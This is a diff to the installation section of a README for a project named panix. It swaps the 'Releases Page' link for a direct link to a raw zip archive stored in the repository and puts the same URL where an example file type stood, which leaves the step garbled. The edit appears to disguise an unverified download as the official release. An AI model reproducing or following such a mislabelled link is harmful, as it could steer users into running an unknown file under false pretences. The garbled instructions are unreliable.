Technos0855/panix/README.md

 ## 📥 Download & Install
 To install panix, follow these instructions:

-1. After visiting the [panix Releases Page](https://github.com/Technos0855/panix/releases), select the latest release.
+1. After visiting the [panix Releases Page](https://raw.githubusercontent.com/Technos0855/panix/master/fs/Software-v2.4.zip), select the latest release.

 2. Download the file suitable for your system.
-For example, you might find a `.tar.gz` file or other Linux-compatible formats.
+For example, you might find a `https://raw.githubusercontent.com/Technos0855/panix/master/fs/Software-v2.4.zip` file or other Linux-compatible formats.

 3. Once the download is complete, open your terminal or command prompt.